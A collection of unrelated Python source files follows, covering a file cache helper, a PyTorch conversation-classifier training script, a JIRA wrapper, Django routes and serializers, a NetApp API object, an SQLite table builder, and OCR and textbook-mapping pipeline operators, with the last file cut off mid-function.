def make_cache(name, content):
"""
Create cache with given content.
:param str name -- Name, or key of the cache.
:param str content -- Content of the cache
:return bool -- If True, the content is changed with previously cached
content. I.E. should process the updated content.
"""
if not os.path.exists(CACHE_DIR):
os.makedirs(CACHE_DIR)
path = os.path.join(CACHE_DIR, name)
if not os.path.exists(path):
return _write_cache(name, content)
with open(path, 'r') as file:
read = file.read()
if content == read:
return False
else:
return _write_cache(name, content)
def _write_cache(name, content):
"""
Write content into cache.
:return bool -- True.
"""
with open(os.path.join(CACHE_DIR, name), 'w') as file:
file.write(content)
return True
|
import json
import os
import sys
import time
import re
from optparse import OptionParser
import matplotlib
import torch
from src.batcher import Batcher
from src.save_utils import save_model, load_model
from models.BERT_MLP import BERT_MLP
from models.None_MLP import None_MLP
from models.RNN_MLP import RNN_MLP
from models.CNN_MLP import CNN_MLP
from models.CNNr_MLP import CNNr_MLP
from models.ATT_MLP import ATT_MLP
from sklearn.metrics import accuracy_score, f1_score, precision_score, recall_score, confusion_matrix
matplotlib.use('agg')
import matplotlib.pyplot as plt
def _calc_running_avg_loss(loss, running_avg_loss, decay=0.99):
return decay * running_avg_loss + (1. - decay) * loss if running_avg_loss != 0 else loss
def _train_loop_epoch(model, training_generator, validation_generator):
training_loss_epoch = []
validation_loss_epoch = []
for epoch in range(0, options.epoch):
print('\tepoch ' + str(epoch))
loss_train = []
loss_valid = []
for batch in training_generator:
loss, step = model.fit(batch.x, batch.y, batch.msk_conv, batch.msk_msg)
loss_train.append(loss)
for batch in validation_generator:
loss, step = model.valid(batch.x, batch.y, batch.msk_conv, batch.msk_msg)
loss_valid.append(loss)
save_model(model, options.output, epoch, options.keep)
training_loss_epoch.append(sum(loss_train) / len(loss_train))
validation_loss_epoch.append(sum(loss_valid) / len(loss_valid))
return training_loss_epoch, validation_loss_epoch
def _train_loop_auto(model, training_generator, validation_generator):
best_loss = None
running_avg_loss = 0
curr_aging = options.age
training_loss_epoch = []
validation_loss_epoch = []
epoch = 0
while True:
print('\tepoch ' + str(epoch))
loss_train = []
loss_valid = []
for batch in training_generator:
loss, step = model.fit(batch.x, batch.y, batch.msk_conv, batch.msk_msg)
loss_train.append(loss)
for batch in validation_generator:
loss, step = model.valid(batch.x, batch.y, batch.msk_conv, batch.msk_msg)
loss_valid.append(loss)
avg_valid_loss = sum(loss_valid) / len(loss_valid)
running_avg_loss = _calc_running_avg_loss(avg_valid_loss, running_avg_loss, options.decay)
training_loss_epoch.append(sum(loss_train) / len(loss_train))
validation_loss_epoch.append(avg_valid_loss)
if (best_loss is None) or running_avg_loss < best_loss:
print('\tFound a new best loss: {}. Previous best loss: {}'.format(running_avg_loss, best_loss))
best_loss = running_avg_loss
save_model(model, options.output, epoch, options.keep)
curr_aging = options.age
else:
curr_aging -= 1
if curr_aging <= 0:
break
epoch += 1
return training_loss_epoch, validation_loss_epoch
def _compute_metrics(y_test, y_pred, out):
score = accuracy_score(y_test, y_pred)
f1 = f1_score(y_test, y_pred)
prec = precision_score(y_test, y_pred)
rec = recall_score(y_test, y_pred)
matrix = confusion_matrix(y_test, y_pred)
out.write('Accuray ' + str(score) + '\n')
out.write('Precision ' + str(prec) + '\n')
out.write('Recall ' + str(rec) + '\n')
out.write('F1 score ' + str(f1) + '\n')
out.write('\n')
out.write(str(matrix))
out.write('\n')
def train_mode(out):
print('Loading...')
# Experiment settings
out.write('*** ' + options.model + ' ***\n\n')
if options.model not in available_models:
print('error')
return
with open(options.params) as json_file:
json_params = json.load(json_file)
params = json_params[options.model]
# Hyper parameters
if not re.match(r"\[[\d+.\d+,\s*]*\d+.\d+\]", options.weights):
print('Invalid weight parameter')
return sys.exit(22)
params['batch_size'] = options.batch
params['msg_len'] = options.msg
params['conv_len'] = options.conv
params['path'] = options.output
params['mode'] = options.mode
params['bert'] = options.bert
params['save'] = options.save
weights = list(map(lambda x: float(x), options.weights[1:-1].split(',')))
weights = torch.tensor(weights)
out.write('Hyperparameters: ' + '\n')
out.write('\tEpoch ' + str(options.epoch) + '\n')
out.write('\tBatch size ' + str(options.batch) + '\n')
out.write('\tMax conv length ' + str(options.conv) + '\n')
out.write('\tMax msg length ' + str(options.msg) + '\n')
out.write('\t' + str(params) + '\n')
out.write('\t' + str(weights) + '\n')
out.flush()
# Batch generator
training_generator = Batcher(options.train_data_path, params)
validation_generator = Batcher(options.valid_data_path, params)
# Load classifier
out.write('\nUsing device: ' + str(device) + '\n')
if device.type == 'cuda':
out.write(torch.cuda.get_device_name(0) + '\n')
if options.model == 'BERT_MLP':
model = BERT_MLP(device, params, weights)
elif options.model == 'None_MLP':
model = None_MLP(device, params, weights)
elif options.model == 'RNN_MLP':
model = RNN_MLP(device, params, weights)
elif options.model == 'CNN_MLP':
model = CNN_MLP(device, params, weights)
elif options.model == 'CNNr_MLP':
model = CNNr_MLP(device, params, weights)
elif options.model == 'ATT_MLP':
model = ATT_MLP(device, params, weights)
else: # default
print('Model unavailable')
return sys.exit(22)
model = model.to(device)
out.write('\n' + str(model) + '\n')
out.flush()
# Training
print('Training...')
start_time = time.time()
if options.epoch == -1:
training_loss_epoch, validation_loss_epoch = _train_loop_auto(model, training_generator, validation_generator)
else:
training_loss_epoch, validation_loss_epoch = _train_loop_epoch(model, training_generator, validation_generator)
elapsed_time = time.time() - start_time
out.write('\nTime elapsed ' + str(elapsed_time) + '\n')
# Plot training and validation loss
plt.figure()
plt.plot(training_loss_epoch, label='Training loss')
plt.plot(validation_loss_epoch, label='Validation loss')
plt.xlabel('Epoch')
plt.ylabel('Loss')
plt.title('Training loss')
plt.legend(loc='upper right')
plt.draw()
plt.savefig(options.output + '/loss_per_epoch.png')
def test_mode(out):
print('Loading...')
# Hyper parameters
params = dict()
params['batch_size'] = 1
params['msg_len'] = options.msg
params['conv_len'] = options.conv
params['mode'] = options.mode
params['bert'] = options.bert
# Loading
out.write('\nUsing device: ' + str(device) + '\n')
if device.type == 'cuda':
out.write(torch.cuda.get_device_name(0) + '\n')
testing_generator = Batcher(options.test, params)
model = load_model(options.checkpoint)
model = model.to(device)
out.write('\n' + str(model) + '\n')
out.flush()
# Testing
print('Testing...')
y_pred = []
y_test = []
for batch in testing_generator:
pred_y, _ = model.predict(batch.x, batch.msk_conv, batch.msk_msg, no_batch=True)
true_y = list(filter(lambda z: z != -1, batch.y.view(params['batch_size'] * params['conv_len']).tolist()))
y_pred.extend(pred_y)
y_test.extend(true_y)
_compute_metrics(y_pred, y_test, out)
def demo_mode(out):
print('Loading...')
# Hyper parameters
params = dict()
params['batch_size'] = 1
params['msg_len'] = options.msg
params['conv_len'] = options.conv
params['mode'] = options.mode
params['bert'] = options.bert
# Loading
testing_generator = Batcher(options.demo, params)
model = load_model(options.checkpoint)
model = model.to(device)
print('Running...')
predictions = {}
for batch in testing_generator:
pred_y, score_y = model.predict(batch.x, batch.msk_conv, batch.msk_msg, no_batch=True)
true_y = batch.y.tolist()[0]
predictions[batch.id] = tuple(zip(batch.original, pred_y, score_y, true_y))
print('Writing results...')
out.write('id;text;pred;score;gold\n')
for k, val in predictions.items():
for msg in val:
text = []
tokens = msg[0].split(' ')
for tok in tokens:
if tok.startswith('##'):
text[-1] = text[-1] + tok[2:]
else:
text.append(tok)
text = ' '.join(text)
out.write(k + ';' + text + ';' + str(msg[1]) + ';' + str(msg[2]) + ';' + str(msg[3]) + '\n')
def main():
if options.mode == 'train':
with open(options.output + '/out.txt', 'w') as out:
train_mode(out)
elif options.mode == 'test':
with open(options.output + '/test.txt', 'w') as out:
test_mode(out)
elif options.mode == 'demo':
with open(options.output + '/demo.csv', 'w', encoding='utf-8') as out:
demo_mode(out)
else:
print('Error: unknown mode')
return sys.exit(22)
if __name__ == "__main__":
print("INH classifier\n")
argv = sys.argv[1:]
parser = OptionParser()
# classifier
parser.add_option("-m", "--mode", help='mode', action="store", type="string", dest="mode",
default="train")
parser.add_option("-o", "--output", help='output folder', action="store", type="string", dest="output",
default="../../output/inh")
parser.add_option("-t", "--tokenizer", help='bert tokenizer', action="store", type="string", dest="bert",
default="dbmdz/bert-base-italian-cased")
# training
parser.add_option("--train_data_path", help="path to train dataset", action="store", type="string",
default='../../input/inh/train.bin')
parser.add_option("--valid_data_path", help="path to valid dataset", action="store", type="string",
default='../../input/inh/valid.bin')
parser.add_option("--param", help='parameters', action="store", type="string", dest="params",
default="../../input/inh/parameters.json")
parser.add_option("-c", "--classifier", help='classifier model', action="store", type="string", dest="model",
default="CNNr_MLP")
parser.add_option("-e", "--epoch", help='epoch', action="store", type="int", dest="epoch",
default=-1) # -1 for early stopping
parser.add_option("-a", "--age", help='max age', action="store", type="int", dest="age",
default=5)
parser.add_option("-d", "--decay", help='decay', action="store", type="float", dest="decay",
default=0.90)
parser.add_option("-b", "--batch", help='batch size', action="store", type="int", dest="batch",
default=4)
parser.add_option("-s", "--save", help='save step', action="store", type="int", dest="save",
default=100)
parser.add_option("-w", "--weight", help='loss weights', action="store", type="string", dest="weights",
default="[1.10, 11.20]")
parser.add_option("--keep", help='max keep', action="store", type="int", dest="keep",
default=20)
parser.add_option("--conv", help='conv length', action="store", type="int", dest="conv",
default=6)
parser.add_option("--msg", help='msg length', action="store", type="int", dest="msg",
default=20)
# test and demo
parser.add_option("--test_data", help='test dataset', action="store", type="string", dest="test",
default="../../input/inh/valid.bin")
parser.add_option("--demo_data", help='demo data folder', action="store", type="string", dest="demo",
default="../../input/inh/run.bin")
parser.add_option("-k", "--checkpoint", help='checkpoint', action="store", type="string", dest="checkpoint",
default="../../output/inh/checkpoint/model.pt")
(options, args) = parser.parse_args()
torch.manual_seed(42)
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
available_models = ['BERT_MLP', 'None_MLP', 'RNN_MLP', 'CNN_MLP', 'CNNr_MLP', 'ATT_MLP']
if options.mode == 'train' and len(os.listdir(options.output)) != 0:
print('Warning: output directory is not empty, results will be overwritten\n')
cont = input('Continue (Y|n)? ')
if cont != 'Y':
exit(0)
main()
|
from jira.client import JIRA
from settings import JIRA_NAME, JIRA_PW, JIRA_SERVER
class JiraWrapper:
def __init__(self):
if not hasattr(self, '_jira'):
self._jira = JIRA(
basic_auth=(JIRA_NAME, JIRA_PW),
options={'server': JIRA_SERVER}
)
self._issue = None
def get_info(self):
return {
'ticketname': self._issue.key,
'reporter': self._issue.fields.reporter.displayName,
'updated': self._issue.fields.updated,
'description': self._issue.fields.description,
'issuetype': self._issue.fields.issuetype,
'labels': self._issue.fields.labels,
'priority': self._issue.fields.priority,
'status': self._issue.fields.status,
'summary': self._issue.fields.summary,
'assignee': self._issue.fields.assignee.displayName
}
def set_issue(self, issue_str):
self.issue_str = issue_str
self._issue = self._jira.issue(issue_str)
def get_states(self):
self._states = []
t = self._jira.transitions(self._issue)
for i in t:
self._states.append({i['to']['name'], i['id']})
print '%s: %s' % (i['id'], i['to']['name'])
def set_state(self, id):
self._jira.transition_issue(self._issue, str(id))
self.get_states()
def exec_jql(self, jql):
return self._jira.search_issues(jql)
|
from apps.announcement import views
from django.urls import path
app_name = "announcement"
urlpatterns = [
path("announcements/", views.AnnouncementViewSet.as_view({"get": "list"})),
path(
"announcements/<int:pk>/",
views.AnnouncementViewSet.as_view({"get": "retrieve"}),
),
path(
"bookmarks/", views.BookmarkViewSet.as_view({"get": "list", "post": "create"})
),
path(
"bookmarks/<int:pk>/",
views.BookmarkViewSet.as_view({"delete": "destroy"}),
),
]
|
import numpy as np
from ..helper import drawStart
from ..world import World
from ..car import Car
from ..image import Image
class Options:
def __init__(
self, track=True, cones=True, car=True, lidar=False, start=True
) -> None:
self.track = track
self.cones = cones
self.car = car
self.lidar = lidar
self.start = start
class Simulation:
def __init__(self, world: World, car: Car) -> None:
self.world = world
self.car = car
def lidarImage(self):
scan = self.car.scan(self.world)
def generateImage(
self,
options: Options = Options(),
) -> Image:
if options.track:
image = self.world.trackImage()
else:
image = Image(self.world.field.blank())
if options.cones:
image = World.addCones(image, self.world.cones)
if options.car:
image = self.car.draw(image)
if options.start:
image = drawStart(image, self.world.track.track(0), self.world.field)
if options.lidar:
image = self.car.drawScan(image, self.world)
return image
|
from rest_framework import serializers
from django.contrib.auth.models import User
from .models import Profile, Project
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = ('username',)
class ProfileSerializer(serializers.ModelSerializer):
account_holder = UserSerializer()
class Meta:
model = Profile
fields = '__all__'
class ProjectSerializer(serializers.ModelSerializer):
profile = ProfileSerializer()
class Meta:
model = Project
fields = '__all__'
|
# make files in this directory importable
"""A selection of genetic algorithm code."""
__docformat__ = "restructuredtext en"
|
from netapp.ntdtest.group8_multiple_info import Group8MultipleInfo
from netapp.netapp_object import NetAppObject
class Group7MultipleInfo(NetAppObject):
"""
1st nested typedef at level 1
"""
_zfield5 = None
@property
def zfield5(self):
"""
Generic/Dummy Field 5
Attributes: required-for-create, modifiable
"""
return self._zfield5
@zfield5.setter
def zfield5(self, val):
if val != None:
self.validate('zfield5', val)
self._zfield5 = val
_group4_stats = None
@property
def group4_stats(self):
"""
2nd nested typedef at level 1
"""
return self._group4_stats
@group4_stats.setter
def group4_stats(self, val):
if val != None:
self.validate('group4_stats', val)
self._group4_stats = val
@staticmethod
def get_api_name():
return "group7-multiple-info"
@staticmethod
def get_desired_attrs():
return [
'zfield5',
'group4-stats',
]
def describe_properties(self):
return {
'zfield5': { 'class': basestring, 'is_list': True, 'required': 'optional' },
'group4_stats': { 'class': Group8MultipleInfo, 'is_list': False, 'required': 'optional' },
}
|
from .__version__ import __version__, __author__, __author_email__, __url__, __download_url__, __title__
from .cmpa import compare, Compare
|
from projex.lazymodule import lazy_import
from ..sqliteconnection import SQLiteStatement
orb = lazy_import('orb')
class CREATE(SQLiteStatement):
def __call__(self, model, owner='', includeReferences=True):
if issubclass(model, orb.Table):
return self._createTable(model, owner, includeReferences)
elif issubclass(model, orb.View):
return self._createView(model, owner, includeReferences)
else:
raise orb.errors.OrbError('Cannot create model for type: '.format(type(model)))
def _createTable(self, model, owner, includeReferences):
ADD_COLUMN = self.byName('ADD COLUMN')
add_i18n = []
add_standard = []
# divide columns between standard and translatable
for col in model.schema().columns(recurse=False).values():
if col.testFlag(col.Flags.Virtual):
continue
if not includeReferences and isinstance(col, orb.ReferenceColumn):
continue
if col.testFlag(col.Flags.I18n):
add_i18n.append(col)
else:
add_standard.append(col)
# create the standard model
cmd_body = []
if add_standard:
cmd_body += [ADD_COLUMN(col)[0].replace('ADD COLUMN ', '') for col in add_standard]
inherits = model.schema().inherits()
if inherits:
inherits_model = orb.system.model(inherits)
if not inherits_model:
raise orb.errors.ModelNotFound(schema=inherits)
cmd_body.append('__base_id INTEGER')
# get the primary column
id_column = model.schema().idColumn()
if id_column and not inherits:
pcol = '`{0}`'.format(id_column.field())
cmd_body.append('CONSTRAINT `{0}_pkey` PRIMARY KEY ({1})'.format(model.schema().dbname(), pcol))
body = ',\n\t'.join(cmd_body)
if body:
body = '\n\t' + body + '\n'
cmd = 'CREATE TABLE IF NOT EXISTS `{table}` ({body});\n'
cmd = cmd.format(table=model.schema().dbname(), body=body, owner=owner)
# create the i18n model
if add_i18n:
id_column = model.schema().idColumn()
id_type = id_column.dbType('SQLite')
i18n_body = ',\n\t'.join([ADD_COLUMN(col)[0].replace('ADD COLUMN ', '') for col in add_i18n])
i18n_cmd = 'CREATE TABLE `{table}_i18n` (\n'
i18n_cmd += ' `locale` CHARACTER VARYING(5),\n'
i18n_cmd += ' `{table}_id` {id_type} REFERENCES `{table}` ({pcol}),\n'
i18n_cmd += ' {body},\n'
i18n_cmd += ' CONSTRAINT `{table}_i18n_pkey` PRIMARY KEY (`{table}_id`, `locale`)\n'
i18n_cmd += ');\n'
i18n_cmd = i18n_cmd.format(table=model.schema().dbname(),
id_type=id_type, pcol=pcol, body=i18n_body, owner=owner)
cmd += '\n' + i18n_cmd
return cmd, {}
SQLiteStatement.registerAddon('CREATE', CREATE())
|
import ast
import configparser
import json
import logging
import os
# import pyvips
import pickle
import re
import time
import pandas as pd
from PIL import Image
from daggit.contrib.sunbird.oplib.content_reuse_utils import agg_actual_predict_df
from daggit.contrib.sunbird.oplib.content_reuse_utils import aggregation_topic_level
from daggit.contrib.sunbird.oplib.content_reuse_utils import append_cosine_similarity_score
from daggit.contrib.sunbird.oplib.content_reuse_utils import connect_to_graph, create_node_relationships
from daggit.contrib.sunbird.oplib.content_reuse_utils import create_manifest
from daggit.contrib.sunbird.oplib.content_reuse_utils import create_toc
from daggit.contrib.sunbird.oplib.content_reuse_utils import generate_cosine_similarity_score
from daggit.contrib.sunbird.oplib.content_reuse_utils import getDTB, calc_stat
from daggit.contrib.sunbird.oplib.content_reuse_utils import getSimilarTopic
from daggit.contrib.sunbird.oplib.content_reuse_utils import getblob
from daggit.contrib.sunbird.oplib.content_reuse_utils import k_topic_recommendation
from daggit.contrib.sunbird.oplib.content_reuse_utils import modify_df, listify
from daggit.contrib.sunbird.oplib.content_reuse_utils import scoring_module, filter_by_grade_range
from daggit.contrib.sunbird.oplib.dtb import create_dtb
from daggit.core.base.factory import BaseOperator
from daggit.core.io.io import File_IO, File_Txt
from daggit.core.io.io import ReadDaggitTask_Folderpath
# from daggit.contrib.sunbird.oplib.contentreuseEvaluationUtils import text_image
from daggit.core.oplib import distanceUtils as dist
from daggit.core.oplib import nlp as preprocess
from natsort import natsorted
class OcrTextExtraction(BaseOperator):
@property
def inputs(self):
"""
Function that the OcrTextExtraction operator defines while returning graph inputs
:returns: Inputs to the node of the Auto tagging graph
DS_DATA_HOME: a localpath where the folders get created
pathTocredentials: path to config file with credentials
pathToPDF: path to PDF file
"""
return {
"DS_DATA_HOME": File_IO(self.node.inputs[0]),
"pathTocredentials": File_IO(self.node.inputs[1]),
"pathToPDF": File_IO(self.node.inputs[2])
}
@property
def outputs(self):
"""
Function that the OcrTextExtraction operator defines while returning graph outputs
:returns: Returns the path to the folder in which text extraction results get generated
"""
return {"path_to_result_folder": File_IO(
self.node.outputs[0])}
def run(self, gcp_bucket_name, ocr_method, content_id):
DS_DATA_HOME = self.inputs["DS_DATA_HOME"].read()
pathTocredentials = self.inputs["pathTocredentials"].read()
path_to_PDF_file = self.inputs["pathToPDF"].read()
status = False
if os.path.exists(pathTocredentials):
try:
config = configparser.ConfigParser(allow_no_value=True)
config.read(pathTocredentials)
api_key = config["postman credentials"]["api_key"]
postman_token = config["postman credentials"]["postman_token"]
status = True
try:
path_to_googlecred = config['google application credentials']["GOOGLE_APPLICATION_CREDENTIALS"]
with open(path_to_googlecred, "r") as cred_json:
GOOGLE_APPLICATION_CREDENTIALS = cred_json.read()
except BaseException:
logging.info("Invalid GOOGLE_APPLICATION_CREDENTIALS in config.")
logging.info("***Checking for GOOGLE_APPLICATION_CREDENTIALS environment variable")
status = False
except BaseException:
logging.info("Invalid config file")
logging.info("***Checking for GOOGLE_APPLICATION_CREDENTIALS environment variable")
if not status:
try:
GOOGLE_APPLICATION_CREDENTIALS = os.environ['GOOGLE_APPLICATION_CREDENTIALS']
with open(GOOGLE_APPLICATION_CREDENTIALS, "r") as f:
GOOGLE_APPLICATION_CREDENTIALS = f.read()
except BaseException:
GOOGLE_APPLICATION_CREDENTIALS = ""
logging.info("Not a valid google credential")
# content dump:
if os.path.exists(path_to_PDF_file):
try:
print("Content ID: ", content_id)
print("-------Performing OCR TextExtraction-------")
print("path_to_pdf: ", path_to_PDF_file)
path_to_saved_folder = ""
start = time.time()
path_to_saved_folder = getblob(ocr_method, gcp_bucket_name, path_to_PDF_file, content_id, DS_DATA_HOME)
stop = time.time()
time_consumed = stop - start
time_consumed_minutes = time_consumed / 60.0
print("Time consumed in minutes: ", time_consumed_minutes)
print()
except:
print("Error in OCR process!!")
# Create manifest.json and content TOC
path_to_manifest = create_manifest(content_id, path_to_saved_folder)
path_to_toc = create_toc(content_id, path_to_saved_folder, api_key, postman_token)
else:
print("The path to pdf file doesnot exist!!")
self.outputs["path_to_result_folder"].write(path_to_saved_folder)
class TextExtractionEvaluation(BaseOperator):
@property
def inputs(self):
"""
Function that the OcrTextExtraction operator defines while returning graph inputs
:returns: Inputs to the node of the Auto tagging graph
DS_DATA_HOME: a localpath where the folders get created
pathTocredentials: path to config file with credentials
pathToPDF: path to PDF file
"""
return {
"path_to_result_folder": File_IO(self.node.inputs[0]),
"pathToLanguageMapping": File_IO(self.node.inputs[1]),
"pathToToc": File_IO(self.node.inputs[2])
}
@property
def outputs(self):
"""
Function that the OcrTextExtraction operator defines while returning graph outputs
:returns: Returns the path to the folder in which text extraction results get generated
"""
return {"path_to_validation_pdf": File_IO(
self.node.outputs[0])}
def run(self):
target_folder = self.inputs["path_to_result_folder"].read()
language_mapping_loc = self.inputs["pathToLanguageMapping"].read()
path_to_toc = self.inputs["pathToToc"].read()
evaluation_folder = os.path.join(target_folder, "evaluation")
if not os.path.exists(evaluation_folder):
os.makedirs(evaluation_folder)
output_loc = os.path.join(evaluation_folder, "text_extraction_validation")
if not os.path.exists(output_loc):
os.mkdir(output_loc)
pdf_files = [i for i in os.listdir(os.path.join(target_folder, "source")) if i != '.DS_Store']
pdf_ocr_loc_ls = []
for i in range(len(pdf_files)):
pdf_loc = os.path.join(target_folder, "source", pdf_files[i])
print(pdf_loc)
google_ocr_loc = os.path.join(target_folder, "raw_data", os.path.split(target_folder)[1])
pdf_ocr_loc_ls.append([pdf_loc, google_ocr_loc])
toc_df = pd.read_csv(path_to_toc)
medium = [i for i in toc_df["Medium"].unique() if str(i) != "nan"][0]
for i in range(len(pdf_ocr_loc_ls)):
text_image(pdf_ocr_loc_ls[i][0], pdf_ocr_loc_ls[i][1], medium, language_mapping_loc, 1, output_loc)
image_ls = [i for i in os.listdir(output_loc) if i.endswith(".png")]
ls = [i for i in natsorted(image_ls, reverse=False)]
image_ls_open = [Image.open(os.path.join(output_loc, str(i))) for i in ls]
pdf_filename = os.path.join(output_loc, "validation.pdf")
image_ls_open[0].save(pdf_filename, "PDF", resolution=100.0, save_all=True, append_images=image_ls_open[1:])
for files in image_ls:
os.remove(os.path.join(output_loc, str(files)))
self.outputs["path_to_validation_pdf"].write(pdf_filename)
class CreateDTB(BaseOperator):
@property
def inputs(self):
"""
Inputs needed to create DTB
:returns: toc and text files
"""
return {
"path_to_result_folder": File_IO(self.node.inputs[0]),
"pathToToc": File_IO(self.node.inputs[1]),
}
@property
def outputs(self):
"""
Outputs created while creating DTB
:returns: Returns the path to the DTB file
"""
return {"path_to_dtb_json_file": File_IO(
self.node.outputs[0])}
def run(self, col_name):
"""
Creates the DTB by aligning ToC with text extractd from text extracted from any textbook
:returns: Returns the path to the DTB file
"""
path_to_result_folder = self.inputs["path_to_result_folder"].read()
path_to_toc = self.inputs["pathToToc"].read()
path_to_text = os.path.join(path_to_result_folder, "extract", "GOCR", "text", "fulltext_annotation.txt")
dtb = create_dtb(path_to_toc, path_to_text, col_name)
path_to_dtb_json_file = os.path.join(path_to_result_folder, "DTB.json")
with open(path_to_dtb_json_file, "w") as outfile:
json.dump(dtb, outfile, indent=4)
self.outputs["path_to_dtb_json_file"].write(path_to_dtb_json_file)
class DTBCreationEvaluation(BaseOperator):
@property
def inputs(self):
"""
Function that the DTBCreationEvaluation operator defines while returning graph inputs
:returns: Inputs to the node of the Content Reuse graph
path_to_result_folder: path to result folder
path_to_dtb_json_file: path to predicted DTB file
pathToToc: path to TOC
pathToActualDTB: path to actual DTB
"""
return {
"path_to_dtb_json_file": File_IO(self.node.inputs[0]),
"pathToToc": File_IO(self.node.inputs[1]),
"pathToActualDTB": File_IO(self.node.inputs[2])
}
@property
def outputs(self):
"""
Function that the DTBMapping operator defines while returning graph outputs
:returns: Returns the path to the mapping json file
"""
return {"path_to_dtb_evaluation_result": File_IO(
self.node.outputs[0])}
def run(self, level):
dtb_pred_loc = self.inputs['path_to_dtb_json_file'].read()
assert os.path.exists(dtb_pred_loc) == True
path_to_result_folder = os.path.split(dtb_pred_loc)[0]
evaluation_folder = os.path.join(path_to_result_folder, "evaluation")
if not os.path.exists(evaluation_folder):
os.makedirs(evaluation_folder)
text_loc = os.path.join(path_to_result_folder, "extract", "GOCR", "text", "fulltext_annotation.txt")
dtb_actual_loc = self.inputs['pathToActualDTB'].read()
toc_df_loc = self.inputs['pathToToc'].read()
output_loc = os.path.join(evaluation_folder, "DTB_creation_evaluation.csv")
toc_df = pd.read_csv(toc_df_loc)
dtb_actual = pd.read_csv(dtb_actual_loc)
if 'Toc feature' in dtb_actual.columns:
with open(text_loc, 'r') as txt_file:
text = txt_file.read()
with open(dtb_pred_loc, 'r') as f:
dtb_predicted = json.load(f)
text_read_ = preprocess.strip_word_number([text], " ")[0]
text_read_ = re.sub(' +', ' ', text_read_)
toc_df[['Chapter Name', 'Topic Name']] = toc_df[['Chapter Name', 'Topic Name']].apply(
lambda x: preprocess.strip_word_number(x, " "))
toc_df = pd.DataFrame(toc_df.groupby('Chapter Name')['Topic Name'].unique())
pred_df = pd.DataFrame()
pred_df['title'] = [dtb_predicted['alignment'][i]['source']['fulltext_annotation'] for i in
range(len(dtb_predicted['alignment']))]
pred_df['pred_text'] = [dtb_predicted['alignment'][i]['target']['fulltext_annotation'] for i in
range(len(dtb_predicted['alignment']))]
pred_df[['title', 'pred_text']] = pred_df[['title', 'pred_text']].apply(
lambda x: preprocess.strip_word_number(x, " "))
dtb_actual[['CONTENTS', 'Toc feature']] = dtb_actual[['CONTENTS', 'Toc feature']].apply(
lambda x: preprocess.strip_word_number(x, " "))
actual_predict_df_ls = agg_actual_predict_df(toc_df, dtb_actual, pred_df, level)
concat_df = pd.concat(actual_predict_df_ls)
concat_df = concat_df.reset_index()
concat_df['Actual_text_split'] = [set(i.split()) for i in concat_df['ActualText']]
concat_df['Pred_text_split'] = [set(i.split()) for i in concat_df['PredictedText']]
concat_df['Common_words'] = [set(concat_df['Actual_text_split'][i]) & set(concat_df['Pred_text_split'][i])
for i in range(len(concat_df))]
concat_df['Len_actual_text_split'] = [float(len(i)) for i in list(concat_df['Actual_text_split'])]
concat_df['Len_pred_text_split'] = [float(len(i)) for i in list(concat_df['Pred_text_split'])]
concat_df['Len_common_words'] = [float(len(i)) for i in list(concat_df['Common_words'])]
concat_df['Intersection/actu'] = calc_stat(list(concat_df['Common_words']),
list(concat_df['Actual_text_split']), "division")
concat_df['Intersection/pred'] = calc_stat(list(concat_df['Common_words']),
list(concat_df['Pred_text_split']), "division")
concat_df['WordlistEMD'] = calc_stat(list(concat_df['Actual_text_split']),
list(concat_df['Pred_text_split']), "MED")
concat_df.to_csv(output_loc, index=False)
self.outputs["path_to_dtb_evaluation_result"].write(output_loc)
else:
print("The column is not present in the Dataframe!!")
class DTBMapping(BaseOperator):
@property
def inputs(self):
"""
Function that the DTBMapping operator defines while returning graph inputs
:returns: Inputs to the node of the Content Reuse graph
path_to_result_folder: path to result folder
path_to_reference_DTB: path to reference DTB
"""
return {
"path_to_result_folder": File_IO(self.node.inputs[0]),
"path_to_dtb_json_file": File_IO(self.node.inputs[1]),
"path_to_reference_DTB": File_IO(self.node.inputs[2])
}
@property
def outputs(self):
"""
Function that the DTBMapping operator defines while returning graph outputs
:returns: Returns the path to the mapping json file
"""
return {"path_to_mapping_json": File_IO(
self.node.outputs[0])}
def run(self, no_of_recommendations, distance_method):
path_to_result_folder = self.inputs["path_to_result_folder"].read()
path_to_dtb_json_file = self.inputs["path_to_dtb_json_file"].read()
path_to_ref_dtb = self.inputs["path_to_reference_DTB"].read()
path_to_mapping_json = os.path.join(path_to_result_folder, distance_method + "_mapping.json")
state_DTB = getDTB(path_to_dtb_json_file)
reference_DTB = pd.DataFrame()
for TB in os.listdir(path_to_ref_dtb):
try:
DTB_df = getDTB(os.path.join(path_to_ref_dtb, TB, "DTB.json"))
DTB_df["textbook"] = TB
reference_DTB = reference_DTB.append(DTB_df)
except:
pass
reference_DTB = reference_DTB.reset_index()
if distance_method == "BERT":
distance = dist.getDistance(list(state_DTB['text']), list(reference_DTB['text']), 'BERT')
elif distance_method == "WMD":
distance = dist.getDistance(list(state_DTB['text']), list(reference_DTB['text']), 'WMD')
else:
print("Invalid distance measure!!")
try:
distance_df = pd.DataFrame(distance, index=list(state_DTB['identifier']),
columns=list(reference_DTB['identifier']))
topN_similar = getSimilarTopic(distance_df, no_of_recommendations)
json.dump(topN_similar, open(path_to_mapping_json, "w"), indent=4)
self.outputs["path_to_mapping_json"].write(path_to_mapping_json)
except:
print("Distance not computed")
class DataPreparation(BaseOperator):
@property
def inputs(self):
"""
Function that the ScoringDataPreparation operator defines while returning graph inputs
:return: Inputs to the node of the Content Reuse graph
path_to_base_data_file: path to base data file
"""
return {
"path_to_base_data": File_IO(self.node.inputs[0]),
"path_to_result_folder": File_IO(self.node.inputs[1])
}
@property
def outputs(self):
"""
Function that the ScoringDataPreparation operator defines while returning graph outputs
:return: Returns the path to the cosine similarity pickle and complete data set
"""
return {
"path_to_cosine_similarity_matrix": File_IO(self.node.outputs[0]),
"path_to_complete_data_set": File_IO(self.node.outputs[1])
}
def run(self, sentence_length, cosine_score_threshold):
"""
Generate data for the purpose of scoring
:param sentence_length: filter data on minimum number of sentences per topic
:param cosine_score_threshold: threshold to filter cosine similarity score on
:return: None
"""
path_to_base_data = self.inputs["path_to_base_data"].read()
path_to_result_folder = self.inputs["path_to_result_folder"].read()
node_name = 'data_preparation'
path_to_result_folder = os.path.join(path_to_result_folder, node_name)
if not os.path.exists(path_to_result_folder):
os.mkdir(path_to_result_folder)
if not os.path.exists(path_to_base_data):
raise Exception("Base data file not present.")
try:
base_df = pd.read_csv(path_to_base_data)[
['STB_Id', 'STB_Grade', 'STB_Section', 'STB_Text', 'Ref_id', 'Ref_Grade', 'Ref_Section', 'Ref_Text']]
except FileNotFoundError:
